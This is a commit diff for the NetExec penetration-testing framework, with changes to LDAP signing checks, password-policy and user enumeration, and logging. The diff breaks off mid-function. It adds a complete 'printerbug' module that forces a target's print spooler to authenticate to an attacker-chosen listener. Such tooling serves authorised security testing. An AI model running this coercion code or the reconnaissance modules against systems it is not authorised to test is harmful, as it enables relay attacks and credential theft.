Merge branch 'main' into neff-ldap-domain

main
Alex 2024-03-24 16:23:13 +01:00 committed by GitHub
commit 09a50d8043
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
23 changed files with 476 additions and 252 deletions

View File

@ -87,8 +87,8 @@ class connection:
self.port = self.args.port self.port = self.args.port
self.conn = None self.conn = None
self.admin_privs = False self.admin_privs = False
self.password = None self.password = ""
self.username = None self.username = ""
self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey) self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey)
self.aesKey = None if not self.args.aesKey else self.args.aesKey[0] self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost

View File

@ -13,7 +13,7 @@ bh_enabled = False
bh_uri = 127.0.0.1 bh_uri = 127.0.0.1
bh_port = 7687 bh_port = 7687
bh_user = neo4j bh_user = neo4j
bh_pass = neo4j bh_pass = bloodhoundcommunityedition
[Empire] [Empire]
api_host = 127.0.0.1 api_host = 127.0.0.1

View File

@ -52,14 +52,14 @@ def add_user_bh(user, domain, logger, config):
_add_with_domain(user_info, domain, tx, logger) _add_with_domain(user_info, domain, tx, logger)
except AuthError: except AuthError:
logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.") logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
return exit()
except ServiceUnavailable: except ServiceUnavailable:
logger.fail(f"Neo4J does not seem to be available on {uri}.") logger.fail(f"Neo4J does not seem to be available on {uri}.")
return exit()
except Exception as e: except Exception as e:
logger.fail(f"Unexpected error with Neo4J: {e}") logger.fail(f"Unexpected error with Neo4J: {e}")
return finally:
driver.close() driver.close()
def _add_with_domain(user_info, domain, tx, logger): def _add_with_domain(user_info, domain, tx, logger):

View File

@ -16,13 +16,11 @@ class NXCAdapter(logging.LoggerAdapter):
logging.basicConfig( logging.basicConfig(
format="%(message)s", format="%(message)s",
datefmt="[%X]", datefmt="[%X]",
handlers=[ handlers=[RichHandler(
RichHandler( console=nxc_console,
console=nxc_console, rich_tracebacks=True,
rich_tracebacks=True, tracebacks_show_locals=False
tracebacks_show_locals=False, )],
)
],
) )
self.logger = logging.getLogger("nxc") self.logger = logging.getLogger("nxc")
self.extra = extra self.extra = extra
@ -40,30 +38,21 @@ class NXCAdapter(logging.LoggerAdapter):
if self.extra is None: if self.extra is None:
return f"{msg}", kwargs return f"{msg}", kwargs
if "module_name" in self.extra and len(self.extra["module_name"]) > 8: if "module_name" in self.extra and len(self.extra["module_name"]) > 11:
self.extra["module_name"] = self.extra["module_name"][:8] + "..." self.extra["module_name"] = self.extra["module_name"][:8] + "..."
# If the logger is being called when hooking the 'options' module function # If the logger is being called when hooking the 'options' module function
if len(self.extra) == 1 and ("module_name" in self.extra): if len(self.extra) == 1 and ("module_name" in self.extra):
return ( return (f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}", kwargs)
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}",
kwargs,
)
# If the logger is being called from nxcServer # If the logger is being called from nxcServer
if len(self.extra) == 2 and ("module_name" in self.extra) and ("host" in self.extra): if len(self.extra) == 2 and ("module_name" in self.extra) and ("host" in self.extra):
return ( return (f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}", kwargs)
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
kwargs,
)
# If the logger is being called from a protocol # If the logger is being called from a protocol
module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"]) if "module_name" in self.extra else colored(self.extra["protocol"], "blue", attrs=["bold"]) module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"]) if "module_name" in self.extra else colored(self.extra["protocol"], "blue", attrs=["bold"])
return ( return (f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}", kwargs)
f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
kwargs,
)
def display(self, msg, *args, **kwargs): def display(self, msg, *args, **kwargs):
"""Display text to console, formatted for nxc""" """Display text to console, formatted for nxc"""
@ -104,17 +93,7 @@ class NXCAdapter(logging.LoggerAdapter):
if len(self.logger.handlers): if len(self.logger.handlers):
try: try:
for handler in self.logger.handlers: for handler in self.logger.handlers:
handler.handle( handler.handle(LogRecord("nxc", 20, "", kwargs, msg=text, args=args, exc_info=None))
LogRecord(
"nxc",
20,
"",
kwargs,
msg=text,
args=args,
exc_info=None,
)
)
except Exception as e: except Exception as e:
self.logger.fail(f"Issue while trying to custom print handler: {e}") self.logger.fail(f"Issue while trying to custom print handler: {e}")
else: else:

View File

@ -35,7 +35,7 @@ class NXCModule:
results = self._detect_installed_services(context, connection, target) results = self._detect_installed_services(context, connection, target)
self.detect_running_processes(context, connection, results) self.detect_running_processes(context, connection, results)
self.dump_results(results, connection.hostname, context) self.dump_results(results, context)
def _get_target(self, connection): def _get_target(self, connection):
return connection.host if not connection.kerberos else f"{connection.hostname}.{connection.domain}" return connection.host if not connection.kerberos else f"{connection.hostname}.{connection.domain}"
@ -58,18 +58,16 @@ class NXCModule:
dce, _ = lsa.connect() dce, _ = lsa.connect()
policyHandle = lsa.open_policy(dce) policyHandle = lsa.open_policy(dce)
try: for product in conf["products"]:
for product in conf["products"]: for service in product["services"]:
for service in product["services"]: try:
lsa.LsarLookupNames(dce, policyHandle, service["name"]) lsa.LsarLookupNames(dce, policyHandle, service["name"])
context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}") context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}")
results.setdefault(product["name"], {"services": []})["services"].append(service) results.setdefault(product["name"], {"services": []})["services"].append(service)
except Exception: except Exception:
pass pass
except Exception as e: except Exception as e:
context.log.fail(str(e)) context.log.fail(str(e))
return results return results
def detect_running_processes(self, context, connection, results): def detect_running_processes(self, context, connection, results):
@ -80,13 +78,16 @@ class NXCModule:
for product in conf["products"]: for product in conf["products"]:
for pipe in product["pipes"]: for pipe in product["pipes"]:
if pathlib.PurePath(fl).match(pipe["name"]): if pathlib.PurePath(fl).match(pipe["name"]):
context.log.debug(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})") context.log.info(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})")
prod_results = results.setdefault(product["name"], {}) prod_results = results.setdefault(product["name"], {})
prod_results.setdefault("pipes", []).append(pipe) prod_results.setdefault("pipes", []).append(pipe)
except Exception as e: except Exception as e:
context.log.debug(str(e)) if "STATUS_ACCESS_DENIED" in str(e):
context.log.fail("Error STATUS_ACCESS_DENIED while enumerating pipes, probably due to using SMBv1")
else:
context.log.fail(str(e))
def dump_results(self, results, remoteName, context): def dump_results(self, results, context):
if not results: if not results:
context.log.highlight("Found NOTHING!") context.log.highlight("Found NOTHING!")
return return
@ -261,7 +262,10 @@ conf = {
{"name": "epfw", "description": "ESET"}, {"name": "epfw", "description": "ESET"},
{"name": "epfwlwf", "description": "ESET"}, {"name": "epfwlwf", "description": "ESET"},
{"name": "epfwwfp", "description": "ESET"}, {"name": "epfwwfp", "description": "ESET"},
{"name": "EraAgentSvc", "description": "ESET"}, {"name": "EraAgentSvc", "description": "ESET Management Agent service"},
{"name": "ERAAgent", "description": "ESET Management Agent service"},
{"name": "efwd", "description": "ESET Communication Forwarding Service"},
{"name": "ehttpsrv", "description": "ESET HTTP Server"},
], ],
"pipes": [{"name": "nod_scriptmon_pipe", "processes": [""]}], "pipes": [{"name": "nod_scriptmon_pipe", "processes": [""]}],
}, },

View File

@ -146,7 +146,7 @@ class NXCModule:
@staticmethod @staticmethod
def save_credentials(context, connection, domain, username, password, lmhash, nthash): def save_credentials(context, connection, domain, username, password, lmhash, nthash):
host_id = context.db.get_computers(connection.host)[0][0] host_id = context.db.get_hosts(connection.host)[0][0]
if password is not None: if password is not None:
credential_type = "plaintext" credential_type = "plaintext"
else: else:

View File

@ -39,10 +39,15 @@ class NXCModule:
async def run_ldaps_noEPA(target, credential): async def run_ldaps_noEPA(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential) ldapsClientConn = MSLDAPClientConnection(target, credential)
_, err = await ldapsClientConn.connect() _, err = await ldapsClientConn.connect()
# Required step to try to bind without channel binding
ldapsClientConn.cb_data = None
if err is not None: if err is not None:
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err)) context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
sys.exit() sys.exit()
_, err = await ldapsClientConn.bind()
valid, err = await ldapsClientConn.bind()
if "data 80090346" in str(err): if "data 80090346" in str(err):
return True # channel binding IS enforced return True # channel binding IS enforced
elif "data 52e" in str(err): elif "data 52e" in str(err):
@ -114,19 +119,30 @@ class NXCModule:
# requirements are enforced based on potential errors # requirements are enforced based on potential errors
# during the bind attempt. # during the bind attempt.
async def run_ldap(target, credential): async def run_ldap(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential) try:
_, err = await ldapsClientConn.connect() ldapsClientConn = MSLDAPClientConnection(target, credential)
if err is None: ldapsClientConn._disable_signing = True
_, err = await ldapsClientConn.bind() _, err = await ldapsClientConn.connect()
if "stronger" in str(err): if err is not None:
return True # because LDAP server signing requirements ARE enforced context.log.fail(str(err))
elif ("data 52e") in str(err):
context.log.fail("Not connected... exiting")
sys.exit()
elif err is None:
return False return False
else:
context.log.fail(str(err)) _, err = await ldapsClientConn.bind()
if err is not None:
errstr = str(err).lower()
if "stronger" in errstr:
return True
# because LDAP server signing requirements ARE enforced
else:
context.log.fail(str(err))
else:
# LDAPS bind successful
return False
# because LDAP server signing requirements are not enforced
except Exception as e:
context.log.debug(str(e))
return False
# Run trough all our code blocks to determine LDAP signing and channel binding settings. # Run trough all our code blocks to determine LDAP signing and channel binding settings.
stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
@ -148,9 +164,8 @@ class NXCModule:
stype=stype, stype=stype,
) )
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain) target = MSLDAPTarget(connection.host, 389, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapIsProtected = asyncio.run(run_ldap(target, credential)) ldapIsProtected = asyncio.run(run_ldap(target, credential))
if ldapIsProtected is False: if ldapIsProtected is False:
context.log.highlight("LDAP Signing NOT Enforced!") context.log.highlight("LDAP Signing NOT Enforced!")
elif ldapIsProtected is True: elif ldapIsProtected is True:
@ -162,7 +177,7 @@ class NXCModule:
if DoesLdapsCompleteHandshake(connection.host) is True: if DoesLdapsCompleteHandshake(connection.host) is True:
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain) target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential)) ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain) target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential)) ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True: if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True:
context.log.highlight('LDAPS Channel Binding is set to "When Supported"') context.log.highlight('LDAPS Channel Binding is set to "When Supported"')

117
nxc/modules/printerbug.py Normal file
View File

@ -0,0 +1,117 @@
from impacket.dcerpc.v5 import transport, rprn
class NXCModule:
name = "printerbug"
description = "Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion."
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.listener = None
def options(self, context, module_options):
"""LISTENER Listener Address (defaults to 127.0.0.1)"""
self.listener = "127.0.0.1"
if "LISTENER" in module_options:
self.listener = module_options["LISTENER"]
def on_login(self, context, connection):
trigger = TriggerAuth(context)
target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
dce = trigger.connect(
username=connection.username,
password=connection.password,
domain=connection.domain,
lmhash=connection.lmhash,
nthash=connection.nthash,
target=target,
doKerberos=connection.kerberos,
dcHost=connection.kdcHost,
aesKey=connection.aesKey,
)
if dce is not None:
context.log.debug("Target is vulnerable to PrinterBug")
trigger.RpcRemoteFindFirstPrinterChange(dce, self.listener, target)
context.log.highlight("VULNERABLE")
dce.disconnect()
else:
context.log.debug("Target is not vulnerable to PrinterBug")
################################################################################
# RPC CALLS
################################################################################
class TriggerAuth:
def __init__(self, context):
self.context = context
def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):
rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\spoolss]" % target)
rpctransport.set_dport(445)
if hasattr(rpctransport, "set_credentials"):
rpctransport.set_credentials(
username=username,
password=password,
domain=domain,
lmhash=lmhash,
nthash=nthash,
aesKey=aesKey,
)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
rpctransport.setRemoteHost(target)
dce = rpctransport.get_dce_rpc()
self.context.log.debug("Connecting to {}".format(r"ncacn_np:%s[\PIPE\spoolfs]") % target)
try:
dce.connect()
except Exception as e:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
return None
try:
dce.bind(rprn.MSRPC_UUID_RPRN)
except Exception as e:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
return None
self.context.log.debug("Successfully bound!")
return dce
def RpcRemoteFindFirstPrinterChange(self, dce, listener, target):
self.context.log.debug("Sending RpcRemoteFindFirstPrinterChange!")
try:
resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
except Exception as e:
if str(e).find("Broken pipe") >= 0:
# The connection timed-out. Let's try to bring it back next round
self.context.log.error("Connection failed - skipping host!")
return
elif str(e).upper().find("ACCESS_DENIED"):
# We're not admin, bye
self.context.log.error("Access denied - RPC call was denied")
dce.disconnect()
return
else:
raise
self.context.log.debug("Got handle")
try:
request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
request["hPrinter"] = resp["pHandle"]
request["fdwFlags"] = rprn.PRINTER_CHANGE_ADD_JOB
request["pszLocalMachine"] = "\\\\%s\x00" % listener
except Exception as e:
self.context.log.debug(e)
try:
dce.request(request)
except Exception as e:
self.context.log.debug(e)

View File

@ -1,92 +1,111 @@
from dateutil.relativedelta import relativedelta as rd
from impacket.ldap import ldapasn1 as ldapasn1_impacket from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
from math import fabs
class NXCModule: class NXCModule:
""" """
Created by fplazar and wanetty Initial FGPP/PSO script written by @n00py: https://github.com/n00py/GetFGPP
Module by @gm_eduard and @ferranplaza
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py
"""
Module by @_sandw1ch
"""
name = "pso" name = "pso"
description = "Query to get PSO from LDAP" description = "Module to get the Fine Grained Password Policy/PSOs"
supported_protocols = ["ldap"] supported_protocols = ["ldap"]
opsec_safe = True opsec_safe = True
multiple_hosts = True multiple_hosts = False
pso_fields = [ def __init__(self, context=None, module_options=None):
"cn", self.context = context
"msDS-PasswordReversibleEncryptionEnabled", self.module_options = module_options
"msDS-PasswordSettingsPrecedence",
"msDS-MinimumPasswordLength",
"msDS-PasswordHistoryLength",
"msDS-PasswordComplexityEnabled",
"msDS-LockoutObservationWindow",
"msDS-LockoutDuration",
"msDS-LockoutThreshold",
"msDS-MinimumPasswordAge",
"msDS-MaximumPasswordAge",
"msDS-PSOAppliesTo",
]
def options(self, context, module_options): def options(self, context, module_options):
"""No options available.""" """No options available."""
def convert_time_field(self, field, value):
time_fields = {"msDS-LockoutObservationWindow": (60, "mins"), "msDS-MinimumPasswordAge": (86400, "days"), "msDS-MaximumPasswordAge": (86400, "days"), "msDS-LockoutDuration": (60, "mins")}
if field in time_fields:
value = f"{int(fabs(float(value)) / (10000000 * time_fields[field][0]))} {time_fields[field][1]}"
return value
def on_login(self, context, connection): def on_login(self, context, connection):
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection""" # Are there even any FGPPs?
# Building the search filter context.log.success("Attempting to enumerate policies...")
search_filter = "(objectClass=msDS-PasswordSettings)" resp = connection.ldapConnection.search(searchBase=f"CN=Password Settings Container,CN=System,{''.join([f'DC={dc},' for dc in connection.domain.split('.')]).rstrip(',')}", searchFilter="(objectclass=*)")
if len(resp) > 1:
context.log.highlight(f"{len(resp) - 1} PSO Objects found!")
context.log.highlight("")
context.log.success("Attempting to enumerate objects with an applied policy...")
try: # Who do they apply to?
context.log.debug(f"Search Filter={search_filter}") resp = connection.search(searchFilter="(objectclass=*)", attributes=["DistinguishedName", "msDS-PSOApplied"])
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=self.pso_fields, sizeLimit=0) for attrs in resp:
except ldap_impacket.LDAPSearchError as e: if isinstance(attrs, ldapasn1_impacket.SearchResultEntry) is not True:
if e.getErrorString().find("sizeLimitExceeded") >= 0:
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
else:
context.log.debug(e)
return False
pso_list = []
context.log.debug(f"Total of records returned {len(resp)}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue continue
for attr in attrs["attributes"]:
if str(attr["type"]) in "msDS-PSOApplied":
context.log.highlight(f"Object: {attrs['objectName']}")
context.log.highlight("Applied Policy: ")
for value in attr["vals"]:
context.log.highlight(f"\t{value}")
context.log.highlight("")
pso_info = {} # Let"s find out even more details!
context.log.success("Attempting to enumerate details...\n")
resp = connection.search(searchFilter="(objectclass=msDS-PasswordSettings)",
attributes=["name", "msds-lockoutthreshold", "msds-psoappliesto", "msds-minimumpasswordlength",
"msds-passwordhistorylength", "msds-lockoutobservationwindow", "msds-lockoutduration",
"msds-passwordsettingsprecedence", "msds-passwordcomplexityenabled", "Description",
"msds-passwordreversibleencryptionenabled", "msds-minimumpasswordage", "msds-maximumpasswordage"])
for attrs in resp:
if not isinstance(attrs, ldapasn1_impacket.SearchResultEntry):
continue
policyName, description, passwordLength, passwordhistorylength, lockoutThreshold, obersationWindow, lockoutDuration, complexity, minPassAge, maxPassAge, reverseibleEncryption, precedence, policyApplies = ("",) * 13
for attr in attrs["attributes"]:
if str(attr["type"]) == "name":
policyName = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutThreshold":
lockoutThreshold = attr["vals"][0]
elif str(attr["type"]) == "msDS-MinimumPasswordLength":
passwordLength = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordHistoryLength":
passwordhistorylength = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutObservationWindow":
observationWindow = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutDuration":
lockoutDuration = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordSettingsPrecedence":
precedence = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordComplexityEnabled":
complexity = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordReversibleEncryptionEnabled":
reverseibleEncryption = attr["vals"][0]
elif str(attr["type"]) == "msDS-MinimumPasswordAge":
minPassAge = attr["vals"][0]
elif str(attr["type"]) == "msDS-MaximumPasswordAge":
maxPassAge = attr["vals"][0]
elif str(attr["type"]) == "description":
description = attr["vals"][0]
elif str(attr["type"]) == "msDS-PSOAppliesTo":
policyApplies = ""
for value in attr["vals"]:
policyApplies += f"{value};"
context.log.highlight(f"Policy Name: {policyName}")
if description:
context.log.highlight(f"Description: {description}")
context.log.highlight(f"Minimum Password Length: {passwordLength}")
context.log.highlight(f"Minimum Password History Length: {passwordhistorylength}")
context.log.highlight(f"Lockout Threshold: {lockoutThreshold}")
context.log.highlight(f"Observation Window: {mins(observationWindow)}")
context.log.highlight(f"Lockout Duration: {mins(lockoutDuration)}")
context.log.highlight(f"Complexity Enabled: {complexity}")
context.log.highlight(f"Minimum Password Age: {days(minPassAge)}")
context.log.highlight(f"Maximum Password Age: {days(maxPassAge)}")
context.log.highlight(f"Reversible Encryption: {reverseibleEncryption}")
context.log.highlight(f"Precedence: {precedence} (Lower is Higher Priority)")
context.log.highlight("Policy Applies to:")
for value in str(policyApplies)[:-1].split(";"):
if value:
context.log.highlight(f"\t{value}")
context.log.highlight("")
try:
for attribute in item["attributes"]:
attr_name = str(attribute["type"])
if attr_name in self.pso_fields:
pso_info[attr_name] = attribute["vals"][0]._value.decode("utf-8")
pso_list.append(pso_info) def days(ldap_time):
return f"{rd(seconds=int(abs(int(ldap_time)) / 10000000)).days} days"
except Exception as e:
context.log.debug("Exception:", exc_info=True) def mins(ldap_time):
context.log.debug(f"Skipping item, cannot process due to error {e}") return f"{rd(seconds=int(abs(int(ldap_time)) / 10000000)).minutes} minutes"
if len(pso_list) > 0:
context.log.success("Password Settings Objects (PSO) found:")
for pso in pso_list:
for field in self.pso_fields:
if field in pso:
value = self.convert_time_field(field, pso[field])
context.log.highlight(f"{field}: {value}")
context.log.highlight("-----")
else:
context.log.info("No Password Settings Objects (PSO) found.")

View File

@ -79,6 +79,7 @@ def main():
else: else:
nxc_logger.logger.setLevel(logging.ERROR) nxc_logger.logger.setLevel(logging.ERROR)
root_logger.setLevel(logging.ERROR) root_logger.setLevel(logging.ERROR)
logging.getLogger("neo4j").setLevel(logging.ERROR)
# if these are the same, it might double log to file (two FileHandlers will be added) # if these are the same, it might double log to file (two FileHandlers will be added)
# but this should never happen by accident # but this should never happen by accident

View File

@ -0,0 +1,13 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket
def parse_result_attributes(ldap_response):
parsed_response = []
for entry in ldap_response:
# SearchResultReferences may be returned
if not isinstance(entry, ldapasn1_impacket.SearchResultEntry):
continue
attribute_map = {}
for attribute in entry["attributes"]:
attribute_map[str(attribute["type"])] = str(attribute["vals"][0])
parsed_response.append(attribute_map)
return parsed_response

View File

@ -5,7 +5,7 @@ import hmac
import os import os
import socket import socket
from binascii import hexlify from binascii import hexlify
from datetime import datetime from datetime import datetime, timedelta
from re import sub, I from re import sub, I
from zipfile import ZipFile from zipfile import ZipFile
from termcolor import colored from termcolor import colored
@ -38,6 +38,7 @@ from nxc.logger import NXCAdapter, nxc_logger
from nxc.protocols.ldap.bloodhound import BloodHound from nxc.protocols.ldap.bloodhound import BloodHound
from nxc.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB from nxc.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB
from nxc.protocols.ldap.kerberos import KerberosAttacks from nxc.protocols.ldap.kerberos import KerberosAttacks
from nxc.parsers.ldap_results import parse_result_attributes
ldap_error_status = { ldap_error_status = {
"1": "STATUS_NOT_SUPPORTED", "1": "STATUS_NOT_SUPPORTED",
@ -287,7 +288,7 @@ class ldap(connection):
# Re-connect since we logged off # Re-connect since we logged off
self.create_conn_obj() self.create_conn_obj()
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-")) self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}".replace(":", "-"))
def print_host_info(self): def print_host_info(self):
self.logger.debug("Printing host info for LDAP") self.logger.debug("Printing host info for LDAP")
@ -370,12 +371,11 @@ class ldap(connection):
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
out = f"{domain}\\{self.username}{used_ccache} {self.mark_pwned()}" out = f"{domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
self.logger.extra["protocol"] = "LDAP" self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389" self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -432,7 +432,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" self.logger.extra["port"] = "636"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -488,7 +488,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389" self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -516,7 +516,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" self.logger.extra["port"] = "636"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -582,7 +582,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389" self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -609,7 +609,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" self.logger.extra["port"] = "636"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -751,37 +751,51 @@ class ldap(connection):
return False return False
def users(self): def users(self):
# Building the search filter """
search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)" Retrieves user information from the LDAP server.
attributes = [
"sAMAccountName", Args:
"description", ----
"badPasswordTime", input_attributes (list): Optional. List of attributes to retrieve for each user.
"badPwdCount",
"pwdLastSet", Returns:
] -------
None
"""
if len(self.args.users) > 0:
self.logger.debug(f"Dumping users: {', '.join(self.args.users)}")
search_filter = f"(|{''.join(f'(sAMAccountName={user})' for user in self.args.users)})"
else:
self.logger.debug("Trying to dump all users")
search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
# default to these attributes to mirror the SMB --users functionality
request_attributes = ["sAMAccountName", "description", "badPwdCount", "pwdLastSet"]
resp = self.search(search_filter, request_attributes, sizeLimit=0)
resp = self.search(search_filter, attributes, sizeLimit=0)
if resp: if resp:
self.logger.display(f"Total of records returned {len(resp):d}") # I think this was here for anonymous ldap bindings, so I kept it, but we might just want to remove it
for item in resp: if self.username == "":
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True: self.logger.display(f"Total records returned: {len(resp):d}")
continue for item in resp:
sAMAccountName = "" if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
description = "" continue
try: self.logger.highlight(f"{item['objectName']}")
if self.username == "": return
self.logger.highlight(f"{item['objectName']}")
else: users = parse_result_attributes(resp)
for attribute in item["attributes"]: # we print the total records after we parse the results since often SearchResultReferences are returned
if str(attribute["type"]) == "sAMAccountName": self.logger.display(f"Total records returned: {len(users):d}")
sAMAccountName = str(attribute["vals"][0]) self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
elif str(attribute["type"]) == "description": for user in users:
description = str(attribute["vals"][0]) # TODO: functionize this - we do this calculation in a bunch of places, different, including in the `pso` module
self.logger.highlight(f"{sAMAccountName:<30} {description}") timestamp_seconds = int(user.get("pwdLastSet", "")) / 10**7
except Exception as e: start_date = datetime(1601, 1, 1)
